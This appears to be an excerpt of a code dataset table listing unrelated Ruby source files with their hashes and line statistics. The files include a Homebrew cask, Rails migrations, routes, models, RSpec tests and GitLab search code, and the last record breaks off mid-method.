hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
1108f763e84b1614659b350781b8916677a3cfe1 | 877 | cask 'omnigraffle' do
if MacOS.release <= :snow_leopard
version '5.4.4'
sha256 '7bcc64093f46bd4808b1a4cb86cf90c0380a5c5ffffd55ce8f742712818558df'
url "http://www.omnigroup.com/ftp1/pub/software/MacOSX/10.6/OmniGraffle-#{version}.dmg"
elsif MacOS.release <= :mavericks
version '6.0.5'
sha256 'a2eff19909d1ba38a4f01b2beecbde2f31f4af43d30e06d2c6921ae8880f85bc'
url "http://www.omnigroup.com/ftp1/pub/software/MacOSX/10.8/OmniGraffle-#{version}.dmg"
else
version '6.4.1'
sha256 '8f1c052e7100baca7a7cda3b5c09f7d3ab0ade7006d32fc193e97a95dee45f79'
url "http://www.omnigroup.com/ftp1/pub/software/MacOSX/10.10/OmniGraffle-#{version}.dmg"
end
name 'OmniGraffle'
homepage 'https://www.omnigroup.com/omnigraffle/'
license :commercial
app 'OmniGraffle.app'
zap delete: '~/Library/Application Support/The Omni Group/OmniGraffle'
end
| 36.541667 | 92 | 0.759407 |
2677a8a4939cec67a536f2f7a1296012413771a8 | 151 | class CreateWeapons < ActiveRecord::Migration
def change
create_table :weapons do |t|
t.string :name
t.timestamps
end
end
end
| 15.1 | 45 | 0.668874 |
03c9602b6d500f821b2322709be204fb56316510 | 579 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe Screening::SendFollowupMailer, type: :mailer do
describe 'notify' do
let(:role) { create(:role) }
let(:mail) { Screening::SendFollowupMailer.notify(role.id) }
it 'renders the subject' do
expect(mail.subject).to eq(I18n.t('dashboard.users.mailers.uncompleted.subject').to_s)
end
it 'renders the receiver email' do
expect(mail.to).to eq([role.user.email])
end
it 'renders the sender email' do
expect(mail.from).to eq(['[email protected]'])
end
end
end
| 25.173913 | 92 | 0.683938 |
bb33dbdb8eafab7c9c61fee78287370baa5724ca | 1,642 | # frozen_string_literal: true
module ElasticAPM
module Transport
RSpec.describe Headers do
let(:config) { Config.new }
subject { described_class.new(config) }
describe 'to_h' do
it 'constructs the default headers from config' do
expect(subject.to_h).to match('User-Agent': String)
end
context 'with a secret token' do
let(:config) { Config.new secret_token: 'TOKEN' }
it 'includes auth bearer' do
expect(subject.to_h).to match(
'User-Agent': String,
'Authorization': 'Bearer TOKEN'
)
end
end
context 'with an api key' do
let(:config) do
Config.new api_key: 'a_base64_encoded_string'
end
it 'includes api key' do
expect(subject.to_h).to match(
'User-Agent': String,
'Authorization': 'ApiKey a_base64_encoded_string'
)
end
end
end
describe 'chunked' do
it 'returns a modified copy' do
chunked = subject.chunked
expect(chunked).to_not be subject
expect(chunked.hash).to_not be subject.hash
expect(subject['Transfer-Encoding']).to be nil
expect(chunked['Transfer-Encoding']).to eq 'chunked'
expect(chunked['Content-Type']).to eq 'application/x-ndjson'
end
context 'with compression' do
it 'sets gzip header' do
chunked = subject.chunked
expect(chunked['Content-Encoding']).to eq 'gzip'
end
end
end
end
end
end
| 27.830508 | 70 | 0.563337 |
5d73bc4de795754c02307036857bbc0e9ab0aa88 | 1,880 | require "spec_helper"
describe Mongoid::Relations::Builders::Referenced::One do
let(:base) do
stub(:new_record? => false)
end
describe "#build" do
let(:criteria) do
Post.where("person_id" => object)
end
let(:metadata) do
stub(
:klass => Post,
:name => :post,
:foreign_key => "person_id",
:criteria => criteria,
:inverse_klass => Person
)
end
let(:builder) do
described_class.new(base, metadata, object)
end
context "when provided an id" do
let(:object_id) do
BSON::ObjectId.new
end
let(:object) do
object_id
end
let(:post) do
stub
end
before do
criteria.expects(:first).returns(post)
end
let!(:documents) do
builder.build
end
it "sets the document" do
documents.should eq(post)
end
end
context "when provided a object" do
let(:object) do
Post.new
end
let(:document) do
builder.build
end
it "returns the object" do
document.should eq(object)
end
end
end
describe "#build" do
let(:person) do
Person.new(:ssn => "345-12-1212")
end
context "when the document is not found" do
it "returns nil" do
person.game.should be_nil
end
end
context "when the document is persisted" do
before do
Mongoid.identity_map_enabled = true
person.save
end
after do
Mongoid.identity_map_enabled = false
end
let!(:game) do
Game.create(:person_id => person.id)
end
it "returns the document" do
person.game.should eq(game)
end
it "pulls the document from the identity map" do
person.game.should equal(game)
end
end
end
end
| 17.090909 | 57 | 0.559043 |
62dbb2d06d6d3f3a56716141f3b48f048d760e7a | 231 | # frozen_string_literal: true
Rails.application.routes.draw do
resources :organizations
root to: 'organizations#index'
# For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html
end
| 25.666667 | 101 | 0.78355 |
61d5445b3bfc3531eae9e252574d22c76df772db | 43 | module SinkUtility
VERSION = "0.1.2"
end
| 10.75 | 19 | 0.697674 |
2669adb8455cc9d17de5df05bb92f2436e96f90c | 4,724 | # frozen_string_literal: true
module Gitlab
class ProjectSearchResults < SearchResults
attr_reader :project, :repository_ref
def initialize(current_user, project, query, repository_ref = nil, per_page: 20)
@current_user = current_user
@project = project
@repository_ref = repository_ref.presence
@query = query
@per_page = per_page
end
def objects(scope, page = nil)
case scope
when 'notes'
notes.page(page).per(per_page)
when 'blobs'
paginated_blobs(blobs, page)
when 'wiki_blobs'
paginated_blobs(wiki_blobs, page)
when 'commits'
Kaminari.paginate_array(commits).page(page).per(per_page)
when 'users'
users.page(page).per(per_page)
else
super(scope, page, false)
end
end
def formatted_count(scope)
case scope
when 'blobs'
blobs_count.to_s
when 'notes'
formatted_limited_count(limited_notes_count)
when 'wiki_blobs'
wiki_blobs_count.to_s
when 'commits'
commits_count.to_s
else
super
end
end
def users
super.where(id: @project.team.members) # rubocop:disable CodeReuse/ActiveRecord
end
def blobs_count
@blobs_count ||= blobs.count
end
# rubocop: disable CodeReuse/ActiveRecord
def limited_notes_count
return @limited_notes_count if defined?(@limited_notes_count)
types = %w(issue merge_request commit snippet)
@limited_notes_count = 0
types.each do |type|
@limited_notes_count += notes_finder(type).limit(count_limit).count
break if @limited_notes_count >= count_limit
end
@limited_notes_count
end
# rubocop: enable CodeReuse/ActiveRecord
def wiki_blobs_count
@wiki_blobs_count ||= wiki_blobs.count
end
def commits_count
@commits_count ||= commits.count
end
def single_commit_result?
return false if commits_count != 1
counts = %i(limited_milestones_count limited_notes_count
limited_merge_requests_count limited_issues_count
blobs_count wiki_blobs_count)
counts.all? { |count_method| public_send(count_method).zero? } # rubocop:disable GitlabSecurity/PublicSend
end
private
def paginated_blobs(blobs, page)
results = Kaminari.paginate_array(blobs).page(page).per(per_page)
Gitlab::Search::FoundBlob.preload_blobs(results)
results
end
def blobs
return [] unless Ability.allowed?(@current_user, :download_code, @project)
@blobs ||= Gitlab::FileFinder.new(project, repository_project_ref).find(query)
end
def wiki_blobs
return [] unless Ability.allowed?(@current_user, :read_wiki, @project)
@wiki_blobs ||= begin
if project.wiki_enabled? && query.present?
unless project.wiki.empty?
Gitlab::WikiFileFinder.new(project, repository_wiki_ref).find(query)
else
[]
end
else
[]
end
end
end
def notes
@notes ||= notes_finder(nil)
end
# rubocop: disable CodeReuse/ActiveRecord
def notes_finder(type)
NotesFinder.new(@current_user, search: query, target_type: type, project: project).execute.user.order('updated_at DESC')
end
# rubocop: enable CodeReuse/ActiveRecord
def commits
@commits ||= find_commits(query)
end
def find_commits(query)
return [] unless Ability.allowed?(@current_user, :download_code, @project)
commits = find_commits_by_message(query)
commit_by_sha = find_commit_by_sha(query)
commits |= [commit_by_sha] if commit_by_sha
commits
end
def find_commits_by_message(query)
project.repository.find_commits_by_message(query)
end
def find_commit_by_sha(query)
key = query.strip
project.repository.commit(key) if Commit.valid_hash?(key)
end
# rubocop: disable CodeReuse/ActiveRecord
def project_ids_relation
Project.where(id: project).select(:id).reorder(nil)
end
# rubocop: enabled CodeReuse/ActiveRecord
def filter_milestones_by_project(milestones)
return Milestone.none unless Ability.allowed?(@current_user, :read_milestone, @project)
milestones.where(project_id: project.id) # rubocop: disable CodeReuse/ActiveRecord
end
def repository_project_ref
@repository_project_ref ||= repository_ref || project.default_branch
end
def repository_wiki_ref
@repository_wiki_ref ||= repository_ref || project.wiki.default_branch
end
def issuable_params
super.merge(project_id: project.id)
end
end
end
| 26.689266 | 126 | 0.671677 |
f752426972e698ea6da32165a528a98481b499a7 | 254 | module Theblog
class ContentNodesController < Theblog::ApplicationController
skip_before_action :authenticate_user!, only: [:show]
def show
@node = ContentNode.by_parent(params[:category]).find_by!(slug: params[:slug])
end
end
end
| 25.4 | 84 | 0.732283 |
bb551bf856a320eddc60dccfc8159e920766127e | 594 | require 'auth'
module API
module ApiHelper
include Auth
def warden
env['warden']
end
def session
env['rack.session']
end
def authenticated
return true if warden.authenticated?
return if headers['Access-Token'].blank?
payload = decode_jwt(headers['Access-Token'])&.first
return unless payload
(@user = User.find_by(id: payload['id'])) && (@user.sub_admin? || @user.admin?)
end
def authenticated_admin
authenticated && @user.admin?
end
def current_user
warden.user || @user
end
end
end
| 17.470588 | 85 | 0.617845 |
081683916f3f766a7b05a548dd277404ef0d9fb5 | 418 | class Group
attr_reader :string, :individuals
def initialize(string)
@string = string.gsub(/\s+/, '')
@individuals = string.split(/\s+/)
end
def unique
string.split('').to_set.count
end
def every
letters = individuals[0].split('')
individuals[1...(individuals.size)].each do |individual|
letters = individual
.split('')
.select { |i| letters.include?(i) }
end
letters.count
end
end | 17.416667 | 58 | 0.655502 |
335954be87dd56f954e24111d07c1104d152df9b | 400 | require 'spec_helper'
require './libraries/default'
describe Ark::GeneralOwner do
let(:subject) { described_class.new(resource) }
let(:resource) do
double(owner: 'owner',
group: 'group',
path: '/resource/path')
end
it 'generates the correct command for windows file ownership' do
expect(subject.command).to eq('chown -R owner:group /resource/path')
end
end
| 23.529412 | 72 | 0.6775 |
ff48a3532ab8990cef3dbcccdebe90b6689d3b18 | 309 | json.officials @officials do |official|
json.(official, :id, :name, :title, :image, :city_id, :bio, :street, :city_code, :state, :zip, :phone, :fax, :email, :facebook)
json.staff_members official.staff_members do |staff_member|
json.(staff_member, :id, :official_id, :name, :email, :title)
end
end
| 38.625 | 129 | 0.695793 |
1aa49d7a6af9bcb3f7d518e6805f9b3a967d762d | 725 | Rails.application.routes.draw do
root 'static_pages#home'
get '/help', to: 'static_pages#help'
get '/about', to: 'static_pages#about'
get '/contact', to: 'static_pages#contact'
get '/signup', to: 'users#new'
post '/signup', to: 'users#create'
get '/login', to: 'sessions#new'
post '/login', to: 'sessions#create'
delete '/logout', to: 'sessions#destroy'
resources :users do
member do
get :following, :followers
end
end
resources :account_activations, only: [:edit]
resources :password_resets, only: [:new, :create, :edit, :update]
resources :microposts, only: [:create, :destroy]
resources :relationships, only: [:create, :destroy]
end
| 30.208333 | 71 | 0.634483 |
1a4b7641549f68743670bddcc060a04ab0d66581 | 3,377 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rake db:seed (or created alongside the db with db:setup).
#
# Examples:
#
# cities = City.create([{ name: 'Chicago' }, { name: 'Copenhagen' }])
# Mayor.create(name: 'Emanuel', city: cities.first)
require 'factory_girl_rails'
require_relative '../test/support/factories'
FactoryGirl.create(:user, email: '[email protected]', password: 'secretpass', password_confirmation: 'secretpass')
['Adjustments Calculator', 'Transaction Processor', 'Flight Plan Recorder'].each do |description|
FactoryGirl.create(:quote, description: description)
end
Quote.first.tap do |quote|
FactoryGirl.create(:section, description: 'Engineering', parent: quote).tap do |section|
FactoryGirl.create :item, description: 'Determine / validate data model and generate Entity Relationship Diagram', parent: section, min_hours: 2, max_hours: 4
FactoryGirl.create :item, description: 'Application modeling / high-level system planning - diagram each portion of the UI / wireframing', parent: section, min_hours: 4, max_hours: 8
FactoryGirl.create :item, description: "Generate user stories to outline the system's functionality from the business's perspective", parent: section, min_hours: 2, max_hours: 4
FactoryGirl.create :item, description: 'Server setup, SSL procurement, etc.', parent: section, min_hours: 0, max_hours: 0
end
FactoryGirl.create(:section, description: 'Design', parent: quote).tap do |section|
FactoryGirl.create :item, description: 'UI/UX Design, Layout for main application, associated stylesheets / html mockups', parent: section, min_hours: 12, max_hours: 18
end
FactoryGirl.create(:section, description: 'Development', parent: quote).tap do |section|
FactoryGirl.create(:section, description: 'Supporting Library Development', parent: section).tap do |subsection|
FactoryGirl.create :item, description: 'Importer libraries (import CSV exports of all data needed for backend for calculation)', parent: subsection, min_hours: 8, max_hours: 10
FactoryGirl.create :item, description: 'Calculator library', parent: subsection, min_hours: 26, max_hours: 45
end
FactoryGirl.create(:section, description: 'Data Models', parent: section).tap do |subsection|
FactoryGirl.create :item, description: 'User authentication, registration, roles system - implementing Devise + CanCan', parent: subsection, min_hours: 0, max_hours: 0
FactoryGirl.create :item, description: 'Data models to support various import files (these should be basic)', parent: subsection, min_hours: 4, max_hours: 6
FactoryGirl.create :item, description: 'Forecast data model (to store a given forecast)', parent: subsection, min_hours: 6, max_hours: 10
end
end
FactoryGirl.create(:section, description: 'Testing', parent: quote).tap do |section|
FactoryGirl.create :item, description: 'Supporting libraries - unit tests', parent: section, min_hours: 6, max_hours: 12
end
FactoryGirl.create(:section, description: 'QA', parent: quote).tap do |section|
FactoryGirl.create :item, description: 'Cross Browser testing/fixes', parent: section, min_hours: 12, max_hours: 16
end
end
FactoryGirl.create :item_template, description: 'Default Template', min_hours: 0, max_hours: 0
| 64.942308 | 186 | 0.752739 |
ab4628bedb4256fd6529ffd48ddc31a593a82677 | 977 | Rails.application.configure do
config.cache_classes = true
config.eager_load = true
config.exceptions_app = routes
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
config.public_file_server.enabled = ENV["RAILS_SERVE_STATIC_FILES"].present?
config.assets.js_compressor = :uglifier
config.assets.compile = false
config.force_ssl = true
config.log_level = :debug
config.log_tags = [:request_id]
config.action_mailer.perform_caching = false
config.i18n.fallbacks = true
config.active_support.deprecation = :notify
config.log_formatter = ::Logger::Formatter.new
config.cache_store = :redis_cache_store
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
end
| 34.892857 | 78 | 0.781986 |
ed966c804e41e274c137d0df502a02a9d6c63b63 | 418 | OFFICIAL_TAPS = %w[
nginx
php
science
].freeze
OFFICIAL_CASK_TAPS = %w[
cask
versions
].freeze
OFFICIAL_CMD_TAPS = {
"homebrew/bundle" => ["bundle"],
"homebrew/test-bot" => ["test-bot"],
"homebrew/services" => ["services"],
}.freeze
DEPRECATED_OFFICIAL_TAPS = %w[
apache
binary
completions
devel-only
dupes
emacs
fuse
games
gui
head-only
python
tex
versions
x11
].freeze
| 12.294118 | 38 | 0.655502 |
08f381a4c8b06fa17529fb321df50454c07dba12 | 2,644 | # encoding: UTF-8
require "forwardable"
module Spontaneous
class Error < StandardError; end
class UnknownTypeException < Error
def initialize(parent, type)
super("Unknown content type '#{type}' requested in class #{parent}")
end
end
class UnknownStyleException < Error
def initialize(style_name, klass)
super("Unknown style '#{style_name}' for class #{klass}")
end
end
# raised when trying to show something that is not showable due to
# ancestor being hidden
class NotShowable < Error
attr_reader :content, :hidden_ancestor_id
def initialize(content, hidden_ancestor_id)
@content, @hidden_ancestor_id = content, hidden_ancestor_id
super("#{content_description(@content)} is not showable as it is hidden by the ancestor #{content_description(hidden_ancestor)}")
end
def content_description(content)
%[#{ content.class } id #{content.id} (#{content.page.path})]
end
def hidden_ancestor
@content.content_model.get(@hidden_ancestor_id)
end
end
class UnknownLayoutError < Error
def initialize(parent_class, layout_name)
@parent_class, @layout_name = parent_class, layout_name
end
end
class UnknownOutputException < Error
def initialize(content_class, unsupported_output_name)
super("Type '#{content_class}' does not output '#{unsupported_output_name}'")
end
end
class UnsupportedFormatException < Error
def initialize(style, unsupported_format)
super("'#{unsupported_format}' format not supported by style '#{style.name}'.\nTemplate path: #{style.directory}\n")
end
end
class InvalidPrototypeDefinitionError < Error; end
class AnonymousRootException < Error
def initialize
super("Content roots must have a valid slug")
end
end
class SingletonException < Error
def initialize(type)
super("Attempt to create a second instance of #{type}")
end
end
class SchemaModificationError < Error
extend Forwardable
attr_reader :modification
def initialize(modification)
@modification = modification
end
def_delegators :@modification, :added_classes, :removed_classes
def_delegators :@modification, :added_fields, :removed_fields
def_delegators :@modification, :added_boxes, :removed_boxes
def_delegators :@modification, :added_styles, :removed_styles
def_delegators :@modification, :added_layouts, :removed_layouts
end
class ReadOnlyScopeModificationError < Error
def initialize(box)
super("Attempt to modify the contents of box #{box.inspect} within a read-only scope")
end
end
end
| 28.12766 | 135 | 0.722769 |
ed92e20e36b4d7c7074d05a8708863c0a8814f14 | 1,808 | require 'spec_helper'
describe Tile do
it 'is initializable' do
expect(Tile.new).not_to be_nil
end
describe '#text' do
it 'is equal to what it was initialized with' do
expect(Tile.new('abc').text).to eq 'abc'
end
end
describe '#x' do
it 'defaults to 0' do
expect(Tile.new.x).to be 0
end
it 'is otherwise what the tile was instantiated with' do
expect(Tile.new('##', 999).x).to be 999
end
end
describe '#y' do
it 'defaults to 0' do
expect(Tile.new.y).to be 0
end
it 'is otherwise what the tile was instantiated with' do
expect(Tile.new('##', 999, 123).y).to be 123
end
end
describe '#cost' do
it 'defaults to 100' do
expect(Tile.new.cost).to be 100
end
it 'is writable' do
t = Tile.new
expect { t.cost=1000 }.to change { t.cost }.from(100).to 1000
end
end
describe '#nabes' do
it 'is an array of [@north, @south, @east, @west], minus the nils' do
t = Tile.new 'tile'
n = Tile.new 'north'
s = Tile.new 'south'
e = Tile.new 'east'
w = Tile.new 'west'
t.north = n; t.south = s; t.east = e; t.west = w
expect(t.nabes).to eq [n, s, e, w]
t.north = nil
expect(t.nabes.length).to be 3
expect(t.north).to be FalseTile
end
end
%w(north south east west).each do |dir|
describe "##{dir}" do
let(:t) { Tile.new }
it 'returns the FalseTile class if nil/unset/false' do
expect(t.send dir).to be FalseTile
end
it 'returns whatever truthy value set to it' do
t.send "#{dir}=", 'anything'
expect(t.send dir).to eq 'anything'
dir_tile = Tile.new
t.send "#{dir}=", dir_tile
expect(t.send dir).to be dir_tile
end
end
end
end
| 22.6 | 73 | 0.576881 |
6ad76693bb53f5f8fbdeac7497e7c4dbd86107a3 | 3,122 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20150512205557) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
create_table "issues", force: :cascade do |t|
t.integer "user_id"
t.string "os"
t.string "time_of_issue"
t.string "date_of_issue"
t.string "security_suite_used"
t.string "city_of_attack"
t.string "country_of_attack"
t.string "industry_of_attack"
t.string "state_of_attack"
t.string "believed_source"
t.string "title"
t.string "description"
t.string "image1"
t.string "image2"
t.string "image3"
t.string "image4"
t.string "video1"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "posts", force: :cascade do |t|
t.integer "user_id"
t.text "body"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "solutions", force: :cascade do |t|
t.string "user_id"
t.string "issue_id"
t.string "title"
t.string "description"
t.string "image1"
t.string "image2"
t.string "image3"
t.string "image4"
t.string "video1"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "users", force: :cascade do |t|
t.string "first_name"
t.string "last_name"
t.string "e_mail"
t.string "city"
t.string "state"
t.string "zipcode"
t.string "country"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.string "email", default: "", null: false
t.string "encrypted_password", default: "", null: false
t.string "reset_password_token"
t.datetime "reset_password_sent_at"
t.datetime "remember_created_at"
t.integer "sign_in_count", default: 0, null: false
t.datetime "current_sign_in_at"
t.datetime "last_sign_in_at"
t.inet "current_sign_in_ip"
t.inet "last_sign_in_ip"
end
add_index "users", ["email"], name: "index_users_on_email", unique: true, using: :btree
add_index "users", ["reset_password_token"], name: "index_users_on_reset_password_token", unique: true, using: :btree
end
| 35.477273 | 119 | 0.665279 |
615775283fa76ba7566669ffb13a2abdb73604d1 | 128 | class AddNameEnToCategories < ActiveRecord::Migration[4.2]
def change
add_column :categories, :name_en, :string
end
end
| 21.333333 | 58 | 0.757813 |
b95e3ee9c47a34d898c19fc5266be466c954d202 | 1,108 | module Concurrent
module Synchronization
# @!visibility private
module MriAttrVolatile
def self.included(base)
base.extend(ClassMethods)
end
module ClassMethods
def attr_volatile(*names)
names.each do |name|
ivar = :"@volatile_#{name}"
class_eval <<-RUBY, __FILE__, __LINE__ + 1
def #{name}
#{ivar}
end
def #{name}=(value)
#{ivar} = value
end
RUBY
end
names.map { |n| [n, :"#{n}="] }.flatten
end
end
def full_memory_barrier
# relying on undocumented behavior of CRuby, GVL acquire has lock which ensures visibility of ivars
# https://github.com/ruby/ruby/blob/ruby_2_2/thread_pthread.c#L204-L211
end
end
# @!visibility private
# @!macro internal_implementation_note
class MriObject < AbstractObject
include MriAttrVolatile
def initialize
# nothing to do
end
end
end
end
| 24.622222 | 108 | 0.535199 |
285368552fc761a9c3eeeed5125202ed51e10664 | 2,297 | require 'bundler'
if Gem::Version.create(RUBY_VERSION) < Gem::Version.create("3.2.0")
require 'pry'
end
require 'rspec-parameterized'
require 'simplecov'
require 'psych'
SimpleCov.start do
add_filter 'spec'
end
SimpleCov.minimum_coverage 99
require 'openapi_parser'
RSpec.configure do |config|
# Enable flags like --only-failures and --next-failure
config.example_status_persistence_file_path = '.rspec_status'
# Disable RSpec exposing methods globally on `Module` and `main`
config.disable_monkey_patching!
config.expect_with :rspec do |c|
c.syntax = :expect
end
end
def load_yaml_file(path)
Psych.safe_load(open(path).read, permitted_classes: [Date, Time])
end
def normal_schema
load_yaml_file('./spec/data/normal.yml')
end
def broken_reference_schema
load_yaml_file('./spec/data/reference-broken.yaml')
end
def petstore_schema
load_yaml_file(petstore_schema_path)
end
def petstore_schema_path
'./spec/data/petstore-expanded.yaml'
end
def petstore_with_discriminator_schema
load_yaml_file('./spec/data/petstore-with-discriminator.yaml')
end
def petstore_with_mapped_polymorphism_schema
load_yaml_file('./spec/data/petstore-with-mapped-polymorphism.yaml')
end
def petstore_with_polymorphism_schema
load_yaml_file('./spec/data/petstore-with-polymorphism.yaml')
end
def json_petstore_schema_path
'./spec/data/petstore.json'
end
def json_with_unsupported_extension_petstore_schema_path
'./spec/data/petstore.json.unsupported_extension'
end
def yaml_with_unsupported_extension_petstore_schema_path
'./spec/data/petstore.yaml.unsupported_extension'
end
def path_item_ref_schema_path
'./spec/data/path-item-ref.yaml'
end
def path_item_ref_schema
load_yaml_file(path_item_ref_schema_path)
end
def build_validate_test_schema(new_properties)
b = load_yaml_file('./spec/data/validate_test.yaml')
obj = b['paths']['/validate_test']['post']['requestBody']['content']['application/json']['schema']['properties']
obj.merge!(change_string_key(new_properties))
b
end
def change_string_key(hash)
new_data = hash.map do |k, v|
if v.kind_of?(Hash)
[k.to_s, change_string_key(v)]
elsif v.kind_of?(Array)
[k.to_s, v.map { |child| change_string_key(child) }]
else
[k.to_s, v]
end
end
new_data.to_h
end
| 22.742574 | 114 | 0.77057 |
e22c0cfcc25566742999a696166afb4db87b5670 | 1,967 |
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "coindcx/version"
Gem::Specification.new do |spec|
spec.name = "coindcx"
spec.version = Coindcx::VERSION
spec.authors = ["Snm Maurya"]
spec.email = ["[email protected]"]
spec.summary = %q{A Ruby library to access coindcx exchange APIs.}
spec.description = %q{An official Ruby library to access coindcx exchange APIs, includes REST and WebSockets.}
spec.homepage = "https://github.com/coindcx-official/coindcx-ruby-client"
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
spec.metadata["allowed_push_host"] = "https://rubygems.org/gems/coindcx-ruby-client"
spec.metadata["homepage_uri"] = spec.homepage
spec.metadata["source_code_uri"] = "https://github.com/coindcx-official/coindcx-ruby-client"
spec.metadata["changelog_uri"] = "https://github.com/coindcx-official/coindcx-ruby-client"
else
raise "RubyGems 2.0 or newer is required to protect against " \
"public gem pushes."
end
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 2.0"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "rspec", "~> 3.0"
spec.add_development_dependency "openssl", "~> 2.1", ">= 2.1.2"
end | 45.744186 | 114 | 0.685816 |
ffc87e4412de9828194d133e99711644b66f3218 | 7,461 | # == Schema Information
#
# Table name: claims
#
# id :integer not null, primary key
# additional_information :text
# apply_vat :boolean
# state :string
# last_submitted_at :datetime
# case_number :string
# advocate_category :string
# first_day_of_trial :date
# estimated_trial_length :integer default(0)
# actual_trial_length :integer default(0)
# fees_total :decimal(, ) default(0.0)
# expenses_total :decimal(, ) default(0.0)
# total :decimal(, ) default(0.0)
# external_user_id :integer
# court_id :integer
# offence_id :integer
# created_at :datetime
# updated_at :datetime
# valid_until :datetime
# cms_number :string
# authorised_at :datetime
# creator_id :integer
# evidence_notes :text
# evidence_checklist_ids :string
# trial_concluded_at :date
# trial_fixed_notice_at :date
# trial_fixed_at :date
# trial_cracked_at :date
# trial_cracked_at_third :string
# source :string
# vat_amount :decimal(, ) default(0.0)
# uuid :uuid
# case_type_id :integer
# form_id :string
# original_submission_date :datetime
# retrial_started_at :date
# retrial_estimated_length :integer default(0)
# retrial_actual_length :integer default(0)
# retrial_concluded_at :date
# type :string
# disbursements_total :decimal(, ) default(0.0)
# case_concluded_at :date
# transfer_court_id :integer
# supplier_number :string
# effective_pcmh_date :date
# legal_aid_transfer_date :date
# allocation_type :string
# transfer_case_number :string
# clone_source_id :integer
# last_edited_at :datetime
# deleted_at :datetime
# providers_ref :string
# disk_evidence :boolean default(FALSE)
# fees_vat :decimal(, ) default(0.0)
# expenses_vat :decimal(, ) default(0.0)
# disbursements_vat :decimal(, ) default(0.0)
# value_band_id :integer
# retrial_reduction :boolean default(FALSE)
#
module Claim
class LitigatorClaim < BaseClaim
route_key_name 'litigators_claim'
validates_with ::Claim::LitigatorClaimValidator, unless: proc { |c| c.disable_for_state_transition.eql?(:all) }
validates_with ::Claim::LitigatorSupplierNumberValidator, if: proc { |c| c.draft? }
validates_with ::Claim::LitigatorClaimSubModelValidator
has_one :fixed_fee,
foreign_key: :claim_id,
class_name: 'Fee::FixedFee',
dependent: :destroy,
inverse_of: :claim,
validate: proc { |claim| claim.step_validation_required?(:fixed_fees) }
has_one :warrant_fee, foreign_key: :claim_id, class_name: 'Fee::WarrantFee', dependent: :destroy, inverse_of: :claim
has_one :graduated_fee,
foreign_key: :claim_id,
class_name: 'Fee::GraduatedFee',
dependent: :destroy,
inverse_of: :claim,
validate: proc { |claim| claim.step_validation_required?(:graduated_fees) }
has_one :interim_claim_info,
foreign_key: :claim_id,
dependent: :destroy,
inverse_of: :claim,
validate: proc { |claim| claim.step_validation_required?(:miscellaneous_fees) }
accepts_nested_attributes_for :fixed_fee, reject_if: :all_blank, allow_destroy: false
accepts_nested_attributes_for :warrant_fee, reject_if: :all_blank, allow_destroy: false
accepts_nested_attributes_for :graduated_fee, reject_if: :all_blank, allow_destroy: false
accepts_nested_attributes_for :interim_claim_info, reject_if: :all_blank, allow_destroy: false
before_validation do
assign_total_attrs
end
SUBMISSION_STAGES = [
{
name: :case_details,
transitions: [
{ to_stage: :defendants }
]
},
{
name: :defendants,
transitions: [
{
to_stage: :offence_details,
condition: ->(claim) { !claim.fixed_fee_case? }
},
{
to_stage: :fixed_fees,
condition: ->(claim) { claim.fixed_fee_case? }
}
],
dependencies: %i[case_details]
},
{
name: :offence_details,
transitions: [
{ to_stage: :graduated_fees }
],
dependencies: %i[case_details defendants]
},
{
name: :fixed_fees,
transitions: [
{ to_stage: :miscellaneous_fees }
],
dependencies: %i[case_details defendants]
},
{
name: :graduated_fees,
transitions: [
{ to_stage: :miscellaneous_fees }
],
dependencies: %i[case_details defendants offence_details]
},
{
name: :miscellaneous_fees,
transitions: [
{ to_stage: :disbursements }
]
},
{
name: :disbursements,
transitions: [
{ to_stage: :travel_expenses }
]
},
{
name: :travel_expenses,
transitions: [
{ to_stage: :supporting_evidence }
]
},
{ name: :supporting_evidence }
].freeze
def lgfs?
self.class.lgfs?
end
def final?
true
end
# Fixed Fee Adder requires a fixed_fees method
def fixed_fees
fixed_fee.nil? ? [] : [fixed_fee]
end
def eligible_case_types
CaseType.lgfs
end
def eligible_basic_fee_types
Fee::BasicFeeType.lgfs
end
def eligible_misc_fee_types
Claims::FetchEligibleMiscFeeTypes.new(self).call
end
def eligible_fixed_fee_types
Claims::FetchEligibleFixedFeeTypes.new(self).call
end
def external_user_type
:litigator
end
def requires_case_concluded_date?
true
end
private
def provider_delegator
provider
end
def cleaner
LitigatorClaimCleaner.new(self)
end
def assign_total_attrs
# TODO: understand if this check is really needed
# left it here mostly to ensure the new changes do
# not impact anything API related
